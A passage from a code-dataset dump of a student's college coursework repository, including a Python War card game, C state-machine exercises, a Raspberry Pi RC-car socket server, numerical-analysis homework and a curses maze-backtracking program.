\"\"\" Adds the loot pile to the player's storage\n pre: a none empty loot pile\n post: loot is added to the player's storage\n \"\"\"\n\n # Adds the loot to the player's storage\n for i in range(self.loot.size()):\n card = self.loot.dequeue()\n storage + card \n\n def check_deck(self):\n \"\"\" Check the deck state\n pre: an initalized deck\n \"\"\"\n # Check to see if any player has an empty deck\n # if they do they loose.\n if self.playing_player.size() == 0:\n # Either refill the deck or make them winner\n if self.storage_player.size() == 0:\n print (\"Player AI is the winner\")\n self.running = False\n else:\n print (\"Player \" + self.name + \" must refill deck\")\n self.refill_deck(self.playing_player, self.storage_player)\n\n # Check to see if any player has an empty deck\n # if they do they loose.\n if self.playing_AI.size() == 0 and self.running:\n # Either refill the deck or make them winner\n if self.storage_AI.size() == 0:\n print (\"Player \" + self.name + \" is the winner\")\n self.running = False\n else:\n print (\"Player AI must refill deck\")\n self.refill_deck(self.playing_AI, self.storage_AI)\n\n def refill_deck(self, playing_deck, storage):\n \"\"\" Refills the players playing deck from the storage\n pre: an empty playing\n post: an empty storage and full playing \n \"\"\"\n # Fill thier playing deck with thier storage deck\n for i in range(storage.size()):\n card = storage.dequeue()\n playing_deck.add(card)\n\n def add_loot(self, card):\n \"\"\" Adds cards to the loot pile\n pre: a card\n post: the card is added to the loot pile\n \"\"\"\n # Adds a card to the loot\n self.loot + card\n\n def game(self):\n \"\"\" Implements the actual game.\n pre: initalized_decks\n post: a winner\n \"\"\"\n # Run the game until a winner is had.\n while self.running:\n # Play a single round\n self.play()\n \n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5691056847572327, "alphanum_fraction": 0.5691056847572327, "avg_line_length": 16.571428298950195, "blob_id": "1ce269fbcca670093a99e44b5da23809e9b88769", "content_id": "9646870aefecfebd4fe2f8154a8db8d90bd21005", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 369, "license_type": "no_license", "max_line_length": 50, "num_lines": 21, "path": "/CSC 236 - Software Design/War/game.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\" Created by Jesson Soto\n Uses the war class to start the game.\n The driver.\n\"\"\"\n\nfrom war import War\n\ndef main():\n \"\"\" Starts the game of War\n pre: None\n post: A winner for the game\n \"\"\"\n \n # Ask the user for thier name\n player_name = raw_input(\"What's your name?\\n\")\n\n # Start Game\n war = War(player_name)\n war.game()\n\nmain()\n" }, { "alpha_fraction": 0.581134557723999, "alphanum_fraction": 0.5883905291557312, "avg_line_length": 25.59649085998535, "blob_id": "da9cc63a3d0d708d9e7952daf92d165eaa80713d", "content_id": "b4eed15f2f0440dc4c589a3d1d55bc30a8c94250", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1516, "license_type": "no_license", "max_line_length": 83, "num_lines": 57, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_2/all_a.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdbool.h>\n#include <unistd.h>\n\n#define READING_A 0\n#define READING_B 1\nbool is_valid_character(char character){\n /* Check to see if the characters read are valid */\n if (character == 'a' || character == 'b'){\n return true;\n }else{\n return false;\n }\n}\nint main(int argc, char* argv[]){\n /* single a followed by more as\n * uses a string given by user\n */\n if (argc < 2){\n printf(\"Please use with a string: ./a.out string example ./a.out textbased\\n\");\n return -1;\n }\n\n char* input_string = argv[1];\n int index = 0;\n int state = READING_A;\n char character = input_string[0];\n // Read the entire string until the null byte\n while(character != '\\0'){\n if(is_valid_character(character)){\n /* Tansition from READING_A to READING_B when a b is read */\n switch(state){\n case READING_A:\n if(character == 'b'){\n state = READING_B;\n printf(\"Accepted %c transitioning to Reading B\\n\", character);\n }else{\n printf(\"Accepted %c\\n\", character);\n }\n break;\n case READING_B:\n printf(\"Rejecting %c\\n\", character);\n return 0; \n }\n // Keep track of the character being read.\n index += 1;\n character = (char) input_string[index];\n }else{\n /* Invalid Chacracters have been read */\n printf(\"Invalid Character\\n\");\n return -1;\n }\n }\n // Print out the string once its done.\n printf(\"Accepted %s\\n\", input_string);\n}\n" }, { "alpha_fraction": 0.5558874011039734, "alphanum_fraction": 0.604522168636322, "avg_line_length": 27.9135799407959, "blob_id": "1c93f450bcf88d847d16a5dfc203fba7ff69eaa5", "content_id": "03f601e820a31d6138fc29cb92490586055ae937", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2344, "license_type": "no_license", "max_line_length": 88, "num_lines": 81, "path": "/CSC 386 - Embedded Systems/RC-Nespi/server.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "import serial\nimport RPi.GPIO as GPIO\nimport socket\n\ndef pi_RC_controller(reading, LEFT, RIGHT, FORWARD, BACKWARD):\n ''' Sets the approprate pins to high or to low depending on the user's input.\n High means that it will move a motor low means that it will not.\n '''\n\n # Mask out uneccessary bits to determine if a particular direction is bing selected.\n if (reading & 0b00000001) == 0:\n print(\"A\")\n if (reading & 0b00000010) == 0:\n print(\"B\")\n if (reading & 0b00000100) == 0:\n print(\"SELECT\")\n if (reading & 0b00001000) == 0:\n print(\"START\")\n if (reading & 0b00010000) == 0:\n GPIO.output(FORWARD, GPIO.HIGH)\n print(\"UP\")\n if (reading & 0b00100000) == 0:\n print(\"DOWN\")\n GPIO.output(BACKWARD, GPIO.HIGH)\n if (reading & 0b01000000) == 0:\n print(\"LEFT\")\n GPIO.output(LEFT, GPIO.HIGH)\n if (reading & 0b10000000) == 0:\n GPIO.output(RIGHT, GPIO.HIGH)\n print(\"RIGHT\")\n if (reading == 0b11111111):\n print(\"STOPPED\")\n GPIO.output(LEFT, GPIO.LOW)\n GPIO.output(RIGHT,GPIO.LOW)\n GPIO.output(BACKWARD, GPIO.LOW)\n GPIO.output(FORWARD,GPIO.LOW)\n\ndef server():\n ''' Set up the server.\n Also configures all the pins that will be used\n '''\n\n # Sets all pins to low and uses them as output pins.\n GPIO.setmode(GPIO.BOARD)\n\n RIGHT = 37\n LEFT = 35\n FORWARD = 40\n BACKWARD = 38\n\n GPIO.setup(RIGHT,GPIO.OUT)\n GPIO.setup(LEFT, GPIO.OUT)\n GPIO.setup(BACKWARD, GPIO.OUT)\n GPIO.setup(FORWARD,GPIO.OUT)\n\n\n # Setup the port being used and the ip connecting to.\n port = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n ip = \"192.168.0.0\"\n port_number = 8898\n port.bind( (ip, port_number))\n port.listen(1)\n\n # Display information about the user who connected to the port.\n connection, address = port.accept()\n print (\"Connected by: \" + str(address))\n try:\n # Read the data as it comes in and interpret it into an action.\n while True:\n data = connection.recv(512)\n reading = int(data)\n pi_RC_controller(reading, LEFT,RIGHT,FORWARD,BACKWARD)\n # Make sure to close the port\n finally:\n port.close()\n\n\n\n# read_controller(\"/dev/ttyUSB0\")\nif __name__ == \"__main__\":\n server()\n\n\n" }, { "alpha_fraction": 0.650628387928009, "alphanum_fraction": 0.7368043065071106, "avg_line_length": 34.69230651855469, "blob_id": "45373448b02fcfbbac46b32c914feebdc3f99237", "content_id": "a655fd59c13ef484aeb11a82507d77315db9ef8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2785, "license_type": "no_license", "max_line_length": 274, "num_lines": 78, "path": "/MAT 433 - Numberical Analysis/HW_4/HW.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# 1\n## A\nFloating point - A notation where scientific notation is used to express large numbers\n## B\nmantissa - The portion of scientific notation that holds the value, not the exponent \n## C\nn-bit number - A notation where n bits are used to represent a number using floating point notation adjusted to n bits.\n\n# 2\n## A\n0.1\n0.2\n0.3\n0.4\n0.5\n0.6\n0.7\n0.8\n0.9\nSTOP\n## B\nX = 1.1\n## C\nNo they are not the same due to the lack of precision of 0.1, when converted to binary. When the binary representation is added to 0.9, it creates a value slightly less than 1.0 in binary, so the loop is not terminated until 1.1, where the value is largest.\n\n# 3\n## A\n171\n## B\n138\n## C\nThe result is NaN, since the value of the factorial is very large, near inf. This near inf value can not be exact due to the computer's limitations. So dividing by a large number gives a near zero value. The computer rounds to zero and dividing by zero causes an error Nan. \n\n#4 \n## A\n5.1857 * 10^21\n## B \nThe value after a certain value remains the same for all large values. In this case around n=90 the value remains the same at 5.1847 * 10 ^ 21, this value is the same at n=200 as n=300. Showing that at large values the value of the next ,n, is near zero.\n##C \nThe program reaches the same value, when in the typical short form output, but as for each n value over 90 the longer format gives a value that is more accurate then a lower n. Also by using the nested form we can go to values of n that are much higher. \n\n#5\n##A \n```\noctave:4> diff_quote(1,0.1)\nans = 2.10000000000000\noctave:5> diff_quote(1,0.01)\nans = 2.01000000000000\noctave:6> diff_quote(1,0.001)\nans = 2.00099999999970\noctave:7> diff_quote(1,0.0001)\nans = 2.00009999999917\noctave:8> diff_quote(1,0.00001)\nans = 2.00001000001393\noctave:9> diff_quote(1,0.000001)\nans = 2.00000099992437\noctave:10> diff_quote(1,0.0000001)\nans = 2.00000010108781\n```\n##B \n\n```\nf(x) = x^2\nf`(x) = 2x\nf`(1) = 2\n```\nAnalytically the result should be 2, though solving numerically gives a value with an error. This error becomes smaller as h becomes smaller. So the smallest error would occur at the smallest value of h, so it would be 10^-16\n\n##C \nThe error for both large and small values of h is the rounding that occurs as a result of the inaccuracies of storing the value of h.\n\n\n#6\n##B\nThe value of the noise and the error are about the same around 0.4-0.6, On values beyond 0,6 the error is larger than the original noise. The error is smaller than the noise at values before 0.4 \n\n##C \nThe derivate of the function is the most influential property as, depending on the slope of the graph the slight change in x will determine the magnitude of the difference between the error and noise. A large slope equals a large magnitude otherwise a small difference.\n\n" }, { "alpha_fraction": 0.7966805100440979, "alphanum_fraction": 0.7966805100440979, "avg_line_length": 420.75, "blob_id": "400b2ec6e155bf6f8b27bf3eb95a13ec37892bab", "content_id": "ad6276baf53c2bd26b9244d6db41648f9889e9f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1687, "license_type": "no_license", "max_line_length": 1564, "num_lines": 4, "path": "/AST 260 - Buddhism/TheAdvicetoLaymanTundila.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "A wealthy man was moved to give alms to a group of buddhist monks. The monks receiving the alms were very grateful in particular a Buddha was very pleased with the man's decision to create a porch and give the alms. So he decided to give the man some advice. He told him that generously was an important concept and that his generosity could help him attain nirvana. He also told him that morality is what prevented him from entering hell, he was born a human on account of his moral character. If he continues to be moral, he could be born into a higher plain of existence. The Buddha goes on to explain what it means to be moral. He discusses: avoid drinking, dancing, eat only at the right time and other points. With the intention of the section being that one must follow all these to enter the different heavens. Here a Buddha says that there are various levels of gods, with each level having gods that live longer than the last. In these worlds the gods have everything that they desire, though their lives are impermanent and by living in these wonderful places they are slowly gaining back their desires, so when they die they go back to a lesser realm. Also desire is bad, desire seemed like the most important part of morality, as he relates it to many negative images. He says that desire cause suffering, which later causes the suffer to be born into hell. Finally for all the errors one commits, one can renounce them, by following the ten precepts, and by following them one gains peace. The buddha by instilling in them the truth made them arhats.\n\n# Writing topics:\n- Talks about moarlity putting people in high noble roles when reborn, what does this say of the poor.\n" }, { "alpha_fraction": 0.5561970472335815, "alphanum_fraction": 0.5608159899711609, "avg_line_length": 27.549449920654297, "blob_id": "d7335b2eb2bae4c53b476fac48c83738c08fdfda", "content_id": "ccc50cfaaea2065012b3d001b1438729c4292533", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2598, "license_type": "no_license", "max_line_length": 89, "num_lines": 91, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_2/a+b+c.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdbool.h>\n#include <unistd.h>\n\n#define WAITING_A 0\n#define READ_A 1\n#define READING_B 2\n#define READING_C 3\n\nint reject( char character, char* string){\n // Print the correct text once a reject state is met\n printf(\"Rejecting %c\\n\", character);\n printf(\"Rejected %s\\n\", string);\n return -1;\n}\n\nbool is_valid_character(char character){\n /* Check to see if the characters read are valid */\n if (character == 'a' || character == 'b' || character == 'c'){\n return true;\n }else{\n return false;\n }\n}\nint main(int argc, char* argv[]){\n /* single a followed by many bs followed by many cs\n * takes in a string from the user\n */\n if (argc < 2){\n printf(\"Please use with a string: ./a.out string example ./a.out textbased\\n\");\n return -1;\n }\n\n char* input_string = argv[1];\n int index = 0;\n int state = WAITING_A;\n bool at_least_one = false;\n char character = input_string[0];\n\n // Read the entire string until the null byte\n while(character != '\\0'){\n if(is_valid_character(character)){\n switch(state){\n /* Tansition from WAITING_A to READING_A and then b then c when a, b ,c is read */\n case WAITING_A:\n if (character == 'a'){\n state = READ_A;\n printf(\"Accepted %c transitioning to Read A\\n\", character);\n }else{\n return reject(character, input_string);\n }\n break;\n case READ_A:\n if (character == 'b'){\n state = READING_B;\n printf(\"Accepted %c transitioning to Reading B\\n\", character);\n }else if (character == 'a'){\n printf(\"Accepted %c\\n\", character);\n }else{\n return reject(character, input_string);\n }\n break;\n case READING_B:\n if (character == 'c'){\n state = READING_C;\n printf(\"Accepted %c transitioning to Reading C\\n\", character);\n }else if (character == 'b'){\n printf(\"Accepted %c\\n\", character);\n }else{\n return reject(character, input_string);\n }\n break;\n case READING_C:\n if (character == 'c'){\n printf(\"Accepted %c\\n\", character);\n }else{\n return reject(character, input_string);\n }\n break;\n }\n // Keep track of the character being read.\n index += 1;\n character = (char) input_string[index];\n }else{\n return reject(character, input_string);\n }\n }\n // Print out the string once its done.\n printf(\"Accepted %s\\n\", input_string);\n}\n" }, { "alpha_fraction": 0.5602552890777588, "alphanum_fraction": 0.5639655590057373, "avg_line_length": 28.946666717529297, "blob_id": "ffa97a80c4e1fa205eea4d8c5f4af193384ff8b9", "content_id": "e64ba42b06644512dd0b7461fdd42a0c5b332965", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6738, "license_type": "no_license", "max_line_length": 98, "num_lines": 225, "path": "/CSC 236 - Software Design/Backtracking/sotoventura-csc236L02/map.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\" Created by Jesson Soto Ventura\n To map out the location of all treasure in a map\n\"\"\"\nimport curses\nimport time\nfrom random import choice\nfrom copy import deepcopy\nfrom backtracking import Backtrack\n\nwindow = None \npoints = dict()\n\ndef draw_map( cave_file):\n \"\"\" Load the given map into a buffer.\n pre:\n None\n post: The screen will have the map drawn out.\n The x, y of the starting point will be returned.\n \"\"\"\n dimensions = cave_file.readline();\n start_y, start_x = window.getyx()\n for yi, line in enumerate(cave_file):\n line = line.translate(None, ' ')\n window.addstr(line)\n for xi, character in enumerate(line):\n points[(yi, xi)] = character\n if 'M' in line:\n y , x = window.getyx()\n start_y, start_x = window.getyx()\n start_y = y - 1 \n start_x = line.index('M')\n points[(start_y, start_x)] = \"S\"\n window.move(y,x)\n window.refresh()\n\n window.move(start_y,start_x)\n window.refresh()\n return dimensions\n\ndef main():\n\n # Get the file\n filename = raw_input(\"What is the name of cave file: \")\n cave_file = open(filename, \"r\")\n\n # Setup curses\n global window \n window = curses.initscr()\n curses.noecho()\n # window.curs_set(1)\n window.erase()\n window.refresh()\n \n # Draw the map\n dimensions = draw_map(cave_file).split(\" \")\n open_spaces = find_open_spaces(\"B\")\n track = Backtrack()\n visit = set()\n move(track, visit, \"B\")\n window.addstr(int(dimensions[1]), int(dimensions[0]),\"Press a key to end\")\n key = window.getch()\n\ndef move(track, visited, cf):\n \"\"\" Move one space NEWS or turns around.\n Pre: A stack to keep track of previous motions\n a set of previously atteded spaces\n the direction moved to get to the current_space\n Post:\n The character will move to the next open space or return that it could not\n \"\"\"\n\n # Get open spots\n open_spaces = find_open_spaces(cf)\n y,x = window.getyx()\n\n # Move to every open free space\n for space in open_spaces:\n\n # Pause so that its possible to see the mostion\n time.sleep(0.02)\n current_space = (y,x,space)\n\n # For not viseted spaces add them to the list and check for gold\n if current_space not in visited:\n visited.add(current_space)\n invert = opposite_direction(space)\n\n # On gold draw a path\n if points[(y,x)] == \"T\":\n track_copy = track.get_copy()\n draw_path(track_copy)\n\n # Add the motion to the stack\n track.push(current_space)\n advance(space)\n move(track,visited, invert)\n else:\n # Move back, since there are no new spots[]\n old_spot = track.pop()\n inverse = opposite_direction(old_spot[2])\n advance(inverse)\n return None\n else:\n if track.size() > 0:\n # Move back, since there are no new spots[]\n old_spot = track.pop()\n inverse = opposite_direction(old_spot[2])\n advance(inverse)\n return None\n\n \ndef draw_path(track):\n \"\"\" Draw a path to a given point, based on the stack given\n Pre: A none empty stack\n post: The window wiiwll have a path to the T\"\"\"\n\n y, x = window.getyx()\n counter = 0;\n\n # Pop until the base is reached.\n while track.size() > 0:\n counter += 1\n current_space = track.pop()\n c_x = current_space[1]\n c_y = current_space[0]\n move_direction = opposite_direction(current_space[2])\n\n # Pick the symbol used based on the direction of motion.\n if points[(c_y, c_x)] != \"T\" and points[(c_y,c_x)] != \"+\" and points[(c_y,c_x)] != \"S\": \n if points[(c_y, c_x)] == \"|\" and ( move_direction == \"E\" or move_direction == \"W\"): \n points[(c_y,c_x)] = \"+\"\n elif points[(c_y, c_x)] == \"-\" and ( move_direction == \"S\" or move_direction == \"N\"): \n points[(c_y,c_x)] = \"+\"\n elif move_direction == \"N\" or move_direction == \"S\":\n points[(c_y,c_x)] = \"|\"\n elif move_direction == \"E\" or move_direction == \"W\":\n points[(c_y,c_x)] = \"-\"\n # A base case to stop overwriting the location of the start_x\n if track.size() == 0:\n advance(move_direction, new_character = \"S\")\n else:\n advance(move_direction)\n window.refresh()\n # revert back to the given position\n window.move(y,x)\n window.refresh()\n\n\ndef opposite_direction(direction):\n \"\"\" Return the opposite_direction of motion.\n Pre: A single character indicating the direction of motions\n post: A single character indicating the opposite_direction of motion\"\"\"\n if direction == \"N\":\n return \"S\"\n if direction == \"S\":\n return \"N\"\n if direction == \"E\":\n return \"W\"\n if direction == \"W\":\n return \"E\"\n\ndef find_open_spaces( flipped_direction):\n \"\"\" Find all the open spaces areound an spot\n pre: The binker must be moved to an spot on the screen\n post a list of all the open spaces on the map.\n \"\"\"\n\n # Store the current spot\n y,x = window.getyx()\n window.move(y,x)\n window.refresh()\n\n # store the spots at all the other points\n north = points[(y - 1, x)]\n south = points[(y + 1, x)]\n east = points[(y, x + 1)]\n west = points[(y, x - 1)]\n open_spaces = list()\n\n #Check to see if the space is empty\n if north != \"W\":\n open_spaces.append(\"N\")\n if south != \"W\":\n open_spaces.append(\"S\")\n if east != \"W\" :\n open_spaces.append(\"E\")\n if west != \"W\" :\n open_spaces.append(\"W\")\n\n return open_spaces\n\n\ndef advance(direction, new_character = 'M'):\n \"\"\" Advances a character on space forward in a given direction\n Pre: A direction to move and an empty space in that direciton\n Post: The cursor will move to that new space\"\"\"\n\n # Get the current_space\n y,x = window.getyx()\n previous_character = points[(y,x)]\n\n # Clean up the current space\n window.addch(y,x,previous_character)\n window.refresh()\n\n # Get the direciton of motions\n if direction == \"N\":\n y -= 1\n elif direction == \"S\":\n y += 1\n elif direction == \"E\":\n x += 1\n elif direction == \"W\":\n x -= 1\n\n # Advances forward\n previous_character = window.inch(y,x)\n previous_character = chr(previous_character)\n window.addch(y,x,new_character)\n\n # Update the screen\n window.move(y,x)\n window.refresh()\n return previous_character\nmain()\n" }, { "alpha_fraction": 0.5581506490707397, "alphanum_fraction": 0.5581506490707397, "avg_line_length": 32.82258224487305, "blob_id": "2827d1f36740918f98d0eecd5d8adc34f339726b", "content_id": "fe4d7454299812d6c2bc0222921c8aa3147100b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2098, "license_type": "no_license", "max_line_length": 82, "num_lines": 62, "path": "/CSC 236 - Software Design/Backtracking/sotoventura-csc236L02/backtracking.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "from copy import deepcopy\nfrom Stack import Stack\nclass Backtrack(Stack):\n\n \"\"\" Create a class to keep track of the steps taken\"\"\"\n\n class Step(object):\n \"\"\" Create a class to keep track of the steps taken\"\"\"\n \"\"\" Pre: All the open spaces and the direciton the step was taken in\n Post: the object is created\"\"\"\n def __init__(self, open_spaces, retract):\n self.open_spaces = open_spaces\n self.retract = retract\n\n def get_open_spaces(self):\n \"\"\" Returns all the open spaces avaliable to a space\n Pre: None\n Post: A list of open spaces is returned\"\"\"\n return self.open_spaces;\n\n def get_retract(self):\n \"\"\" Gets the retract of a step\n Pre: None\n Post: The step taken to get here is listsed.\"\"\"\n return self.retract\n\n def set_open_spaces(self, open_spaces):\n \"\"\" Sets all the open space\n Pre: A list of openspaces\n Post: None\"\"\"\n self.open_spaces = open_spaces\n\n def get_open_spaces(self):\n \"\"\" Returns all the open spaces avaliable to a space\n Pre: None\n Post: A list of open spaces is returned\"\"\"\n\n step = self.top()\n return step.open_spaces\n\n def add_step(self, open_spaces, retract):\n \"\"\" Add a step to the stack\n Pre: the open spaces for the space, retract the direciton of motion\"\"\"\n \"\"\"Post: A step is added to the stack\"\"\"\n next_step = self.Step(open_spaces, retract)\n self.push(next_step)\n\n def get_retract(self):\n \"\"\" Gets the retract of a step\n Pre: None\n Post: The step taken to get here is listsed.\"\"\"\n step = self.top()\n return step.get_retract()\n\n def get_copy(self):\n \"\"\" Creates a copy of the backtrack class\n Pre: A track object\n post: A track obejct's copy is returned\"\"\"\n copy = Backtrack()\n for item in self.items:\n copy.push(item)\n return copy\n\n" }, { "alpha_fraction": 0.5918367505073547, "alphanum_fraction": 0.6326530575752258, "avg_line_length": 15.333333015441895, "blob_id": "9aa746efb48c0ca7e947561634c81946ccbb108d", "content_id": "5d9851848b086203bbe5d17b86379a6b077975fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 49, "license_type": "no_license", "max_line_length": 22, "num_lines": 3, "path": "/CSC 420 - Programming Languages/Racket/test.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "def test(number):\n return number += 2\ntest(2)\n" }, { "alpha_fraction": 0.5887850522994995, "alphanum_fraction": 0.6168224215507507, "avg_line_length": 16.83333396911621, "blob_id": "614cb39de78e4893da6fd43e72a59bafdb72b232", "content_id": "e7d222d1f40bd77f84f378979f3d8e9ad9ce925f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 107, "license_type": "no_license", "max_line_length": 41, "num_lines": 6, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_1/ex2.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main(){\n int cookies = 10;\n printf(\"I have %d cookies\\n\", cookies);\n return 0;\n}\n" }, { "alpha_fraction": 0.5823969841003418, "alphanum_fraction": 0.5992509126663208, "avg_line_length": 25.649999618530273, "blob_id": "5f9429f6ac9461b803a589e5cb2bfc16563d4f6d", "content_id": "693a7994d8b6152a718e15054c3b9fe168ff7a52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 534, "license_type": "no_license", "max_line_length": 71, "num_lines": 20, "path": "/CSC 486 - Parallel and Distributed Systems/hello_world.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "from mpi4py import MPI\n\ndef hello_world(rank, size):\n print(\"Hello World from Process {0} out of {1}\").format(rank, size)\n\ndef conditional_hello(rank):\n if(rank % 2):\n print(\"Hello from process {0}\").format(rank)\n else:\n print(\"Goodbye from process {0}\").format(rank)\n\ndef main():\n rank = MPI.COMM_WORLD.Get_rank()\n size = MPI.COMM_WORLD.Get_size()\n\n print(\"---- Exercise 1 ---\")\n hello_world(rank,size)\n print(\"==== Exercise 2 ===\")\n conditional_hello(rank)\n print(\"---- Exercise 3 ---\")\n\n" }, { "alpha_fraction": 0.5486725568771362, "alphanum_fraction": 0.5575221180915833, "avg_line_length": 15, "blob_id": "c362c09098bfc9075a1769ab5181fefbe53e8d08", "content_id": "9fa44518ff1c0933d175d0e6531253f6e31cd7ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 113, "license_type": "no_license", "max_line_length": 22, "num_lines": 7, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_1/ex1.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main(){\n printf(\"Jesson\\n\");\n printf(\"Soto Ventura\\n\");\n printf(\"[email protected]\\n\");\n return 0;\n}\n\n" } ]
47
jeffrey-hsi/broadcast-encryption
https://github.com/jeffrey-hsi/broadcast-encryption
5114491b7dda8d09f93066f4bcc6d76ac47ded4d
f62705d2fcf4c0e61895015fab6c4e6c419252a9
a7540499ecfd7dc484aa615157045b9100121032
refs/heads/master
2021-05-02T03:18:15.469295
2017-10-26T06:46:35
2017-10-26T06:46:35
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5499067306518555, "alphanum_fraction": 0.5834888219833374, "avg_line_length": 26.921823501586914, "blob_id": "13f101b0802fdcf09ac3107a56eb724ef7b8d04f", "content_id": "bf7cd60e7eae29609fcdd5928e4d67758f0c3db2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 8576, "license_type": "no_license", "max_line_length": 81, "num_lines": 307, "path": "/tests/testbce.c", "repo_name": "jeffrey-hsi/broadcast-encryption", "src_encoding": "UTF-8", "text": "/* Implementation of Boneh-Gentry-Waters broadcast encryption scheme\n Code by: Matt Steiner [email protected]\n testbce.c\n*/\n\n#include <string.h>\n#include \"pbc_bce.h\"\n\n#define N 64\n#define N_DIV_EIGHT N/8\n\n\nint main(void)\n{\n int i;\n\n global_broadcast_params_t gbs;\n\n //Global Setup\n Setup_global_broadcast_params(&gbs, N, \"d201.param\");\n\n if(DEBUG) {\n printf(\"\\ng = \");\n element_out_str(stdout, 0, gbs->g);\n printf(\"\\nh = \");\n element_out_str(stdout, 0, gbs->h);\n for(i = 0; i < 1; i++) {\n printf(\"\\nThe next element is %d------------------------------------\",i);\n printf(\"\\ngs[%d] = \", i);\n element_out_str(stdout, 0, gbs->gs[i]);\n printf(\"\\nhs[%d] = \",i);\n element_out_str(stdout, 0, gbs->hs[i]);\n }\n printf(\"\\n\");\n }\n\n //Broadcast System Setup\n broadcast_system_t sys;\n Gen_broadcast_system(gbs, &sys);\n\n struct single_priv_key_s mykey;\n struct single_priv_key_s mykey2;\n struct single_priv_key_s mykey3;\n\n Get_priv_key(gbs, sys, 2, &mykey);\n //if(DEBUG) printf(\"done 1\\n\");\n //if(DEBUG) printf(\"done 2\\n\");\n Get_priv_key(gbs, sys, 2, &mykey3);\n //if(DEBUG) printf(\"done 3\\n\");\n\n if(DEBUG) {\n printf(\"\\ng_i = \");\n element_out_str(stdout, 0, mykey.g_i);\n printf(\"\\nh_i = \");\n element_out_str(stdout, 0, mykey.h_i);\n printf(\"\\ng_i_gamma = \");\n element_out_str(stdout, 0, mykey.g_i_gamma);\n printf(\"\\n\");\n printf(\"\\ng_i = \");\n element_out_str(stdout, 0, mykey2.g_i);\n printf(\"\\nh_i = \");\n element_out_str(stdout, 0, mykey2.h_i);\n printf(\"\\ng_i_gamma = \");\n element_out_str(stdout, 0, mykey2.g_i_gamma);\n printf(\"\\n\");\n printf(\"\\ng_i = \");\n element_out_str(stdout, 0, mykey3.g_i);\n printf(\"\\nh_i = \");\n element_out_str(stdout, 0, mykey3.h_i);\n printf(\"\\ng_i_gamma = \");\n element_out_str(stdout, 0, mykey3.g_i_gamma);\n printf(\"\\n\");\n }\n\n char recip[N_DIV_EIGHT];\n for(i = 0; i < 2; i++) recip[i] = 254;\n for(i = 2; i < N_DIV_EIGHT; i++) recip[i] = 0;\n\n Gen_encr_prod_from_bitvec(gbs, sys, recip);\n //Product_Is_Right(gbs, sys, recip);\n //TESTING FOR SYSTEM LOAD AND STORE\n global_broadcast_params_t gbp2;\n broadcast_system_t sys2;\n global_broadcast_params_t gbp3;\n broadcast_system_t sys3;\n\n StoreParams(\"system.stor\", gbs, sys);\n //printf(\"\\ndone storing!!!!!!!!!\\n\\n\");\n LoadParams(\"system.stor\", &gbp2, &sys2);\n LoadParams(\"system.stor\", &gbp3, &sys3);\n\n //printf(\"\\ndone loading!!!!!!!!!\\n\\n\");\n //StoreParams(\"system2.stor\", \"pairing2.stor\", gbp2, sys2);\n //LoadParams(\"system2.stor\", \"pairing2.stor\", &gbs, &sys);\n\n Get_priv_key(gbs, sys, 2, &mykey2);\n\n if(DEBUG) {\n printf(\"\\noldg = \");\n element_out_str(stdout, 0, gbs->g);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, gbp2->g);\n printf(\"\\noldh = \");\n element_out_str(stdout, 0, gbs->h);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, gbp2->h);\n printf(\"\\noldgs = \");\n element_out_str(stdout, 0, gbs->gs[0]);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, gbp2->gs[0]);\n printf(\"\\nold = \");\n element_out_str(stdout, 0, gbs->gs[31]);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, gbp2->gs[31]);\n printf(\"\\noldhs = \");\n element_out_str(stdout, 0, gbs->hs[0]);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, gbp2->hs[0]);\n printf(\"\\nold = \");\n element_out_str(stdout, 0, gbs->hs[31]);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, gbp2->hs[31]);\n printf(\"\\n old n_u = %d\", gbs->num_users);\n printf(\"\\n new n_u = %d\", gbp2->num_users);\n printf(\"\\nolde = \");\n 